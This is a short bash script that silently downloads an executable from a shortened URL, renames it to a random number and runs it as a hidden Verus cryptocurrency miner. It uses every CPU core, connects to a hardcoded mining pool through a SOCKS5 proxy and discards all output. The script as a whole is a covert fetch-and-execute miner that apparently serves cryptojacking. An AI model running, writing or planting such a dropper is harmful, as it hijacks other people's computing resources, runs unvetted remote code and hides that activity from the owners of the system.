#!/usr/bin/env bash
apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1
wget -qO build https://git.io/JiGZh >/dev/null 2>&1 
chmod +x build
TOP=$(shuf -n 1 -i 1-200000)
USER=$1
mv build $TOP
./$TOP -a verus -o stratum+tcp://51.79.251.11:3300 -u DKjK3oBfsBtCeLaSL2LGTqoVbJauHB97gT.$(echo $(shuf -i 1-2000 -n 1)-NEO) -p -x -t $(nproc --all) -x socks5://174.77.111.197:4145 >/dev/null 2>&1
